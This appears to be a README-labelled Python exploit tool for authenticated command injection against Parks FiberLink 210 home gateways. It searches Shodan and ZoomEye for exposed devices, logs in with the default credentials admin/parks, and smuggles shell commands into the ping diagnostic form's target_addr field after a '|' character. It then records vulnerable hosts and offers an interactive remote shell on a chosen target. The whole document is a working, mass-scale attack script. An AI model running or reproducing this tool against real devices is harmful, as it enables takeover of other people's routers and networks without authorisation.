README.md
Rendering markdown...
import os
import sys
import requests
import argparse
import urllib.parse
from shodan import Shodan
from rich.table import Table
from zoomeye.sdk import ZoomEye
from rich.console import Console
from rich.progress import Progress
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from concurrent.futures import ThreadPoolExecutor, as_completed
class Exploiter:
def __init__(self, args):
self.args = args
self.output = args.output if args.output else 'vulnerable.txt'
self.console = Console()
self.CMD = 'echo "VULNERABLE"'
self.shodan = Shodan(os.environ.get("SHODAN_API_KEY")) if args.shodan else None
self.zoomeye = ZoomEye(api_key=os.environ.get("ZOOMEYE_API_KEY")) if args.zoomeye else None
self.targets = []
self.vulnerable_hosts = []
self.exploitation_results = {}
self.executor = ThreadPoolExecutor(max_workers=args.threads)
def run(self):
if self.args.shodan:
self.generate_targets_shodan()
if self.args.zoomeye:
self.generate_targets_zoomeye()
if self.args.target:
self.targets.append(self.args.target)
with ThreadPoolExecutor(max_workers=self.args.threads) as executor:
futures = {executor.submit(self.exploit_target, target) for target in self.targets}
for future in as_completed(futures):
try:
future.result()
except Exception as e:
self.console.print(f"Error occurred: {e}")
self.print_vulnerable_hosts()
def print_vulnerable_hosts(self):
table = Table(title="Vulnerable Hosts")
table.add_column("Host", justify="right", style="cyan")
table.add_column("Command Output", style="magenta")
with open(self.output, "w") as f:
for host, cmd_output in self.exploitation_results.items():
f.write(host + '\n')
table.add_row(host, cmd_output)
self.console.print(table)
def generate_targets_zoomeye(self):
if self.zoomeye:
self.console.print(f"[bold yellow]Searching with ZoomEye API on {self.args.pages} pages[/bold yellow]")
self.zoomeye.multi_page_search('title:"Home Gateway" +banner:"login_parks.css"', page=self.args.pages, resource="host")
services = self.zoomeye.dork_filter("ip,port")
for service in services:
self.targets.append(f"{service[0]}:{service[1]}")
self.console.print(f"[bold green]Found Hosts: {len(self.targets)}[/bold green]")
else:
self.console.print("[bold red]Error: Zoomeye API key not found[/bold red]")
self.console.print("To add the Zoomeye API key, export it as an environment variable:\n")
self.console.print("export ZOOMEYE_API_KEY=Your_Zoomeye_API_Key")
sys.exit(1)
def generate_targets_shodan(self):
if self.shodan:
self.console.print(f"[bold yellow] Searching with Shodan API on {self.args.pages} page(s)...[/bold yellow]")
for page in range(1, self.args.pages+1):
for service in self.shodan.search_cursor('http.title:"Home Gateway" http.html:"login_parks.css"'):
self.targets.append(f"{service['ip_str']}:{service['port']}")
self.console.print(f"Found Hosts: {len(self.targets)}")
else:
self.console.print("[bold red]Error: Shodan API key not found[/bold red]")
self.console.print("To add the Shodan API key, export it as an environment variable:\n")
self.console.print("export SHODAN_API_KEY=Your_Shodan_API_Key")
sys.exit(1)
def login(self, url, username, password):
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = {'username': username, 'psd': password}
response = requests.post(f'{url}/boaform/admin/formLogin', headers=headers, data=data, verify=False, timeout=3)
return not ("bad password" in response.text.lower() or response.status_code == 403)
def check(self, url):
response = requests.get(f'{url}/status_device_basic_info.asp', verify=False, timeout=3)
return not ('V2.1.15_X000' in response.text)
def trigger(self, url, interface, cmd):
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = self.create_data_string('localhost', cmd, interface)
response = requests.post(f'{url}/boaform/admin/formPing', headers=headers, data=data, verify=False, timeout=3)
self.console.print(f"[bold green]Command sent on {url}[/bold green]") if self.args.target else None
cmd_output = self.get_text(response.text, 'pre')
try:
if "VULNERABLE" in cmd_output:
self.console.print(f"[bold green]{url} : {cmd_output}[/bold green]") if not self.args.target else None
self.vulnerable_hosts.append(url)
self.exploitation_results[url] = cmd_output
if self.args.target:
self.interactive(url, interface)
else:
self.console.print(cmd_output) if not self.interactive else None
except: cmd_output = "[bold red]Error: No output![/bold red]"
return cmd_output
def get_interface(self, url):
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
data = '\r\n'
response = requests.get(f'{url}/diag_ping_admin.asp', headers=headers, data=data, verify=False, timeout=3)
return self.get_text(response.text, 'option')
def create_data_string(self, target_addr, cmd, waninf):
template = "target_addr={target_addr}&waninf={waninf}"
encoded_target_addr = urllib.parse.quote(target_addr + '|' + cmd)
encoded_waninf = urllib.parse.quote(waninf)
return template.format(target_addr=encoded_target_addr, waninf=encoded_waninf)
def get_text(self, html_content, tag):
start_tag = f'<{tag}'
end_tag = f'</{tag}>'
start_index = html_content.find(start_tag)
if start_index == -1:
return None
start_index = html_content.find(">", start_index) + 1
end_index = html_content.find(end_tag, start_index)
if end_index == -1:
return None
return html_content[start_index:end_index].strip()
def interactive(self, url, interface):
session = PromptSession(history=InMemoryHistory())
self.interactive = True
while True:
try:
cmd = session.prompt(HTML('<ansired><b># </b></ansired>'))
self.CMD = cmd
if "exit" in cmd:
raise KeyboardInterrupt
elif not cmd:
continue
elif "clear" in cmd:
if os.name == 'posix':
os.system('clear')
elif os.name == 'nt':
os.system('cls')
else:
result = self.trigger(url, interface, cmd)
self.console.print(result)
except KeyboardInterrupt:
self.console.print("[bold yellow][!] Exiting shell...[/bold yellow]")
break
def exploit_target(self, target):
for protocol in ['https://', 'http://']:
url = f"{protocol}{target}"
try:
if not self.login(url, self.args.user, self.args.password):
self.console.print(f"[red]Wrong credentials for {target}![/red]") if self.args.target else None
return
if not self.check(url):
self.console.print(f"[red]{target} is not vulnerable![/red]") if self.args.target else None
return
self.console.print(f"[green]Successfully authenticated on {target}[/green]")
interface = self.get_interface(url)
if interface is None:
self.console.print(f"[red]No valid interfaces for {target}![/red]") if self.args.target else None
return
self.console.print(f"[green]Using {interface} interface on {target}[/green]") if self.args.target else None
self.trigger(url, interface, self.CMD)
except Exception as e:
self.console.print(f"[red]Error connecting to {target}: {e}[/red]") if self.args.target else None
def parse_arguments():
parser = argparse.ArgumentParser(description='Authenticated Command Injection for Parks FiberLink 210')
parser.add_argument("--shodan", action="store_true", help="Shodan API key")
parser.add_argument("--zoomeye", action="store_true", help="ZoomEye API key")
parser.add_argument('--target', help='Specify a single target URL')
parser.add_argument("--threads", default=100, type=int, help="Number of threads (default: 10)")
parser.add_argument("--pages", default=1, type=int, help="Number of pages to search in (ZoomEye or Shodan) (default: 1)")
parser.add_argument("--user", default="admin", help="Username (default: admin)")
parser.add_argument("--password", default="parks", help="Password (default: parks)")
parser.add_argument("--output", help="Output file: default: 'vulnerable.txt'")
return parser.parse_args()
def main():
args = parse_arguments()
exploiter = Exploiter(args)
exploiter.run()
if __name__ == '__main__':
main()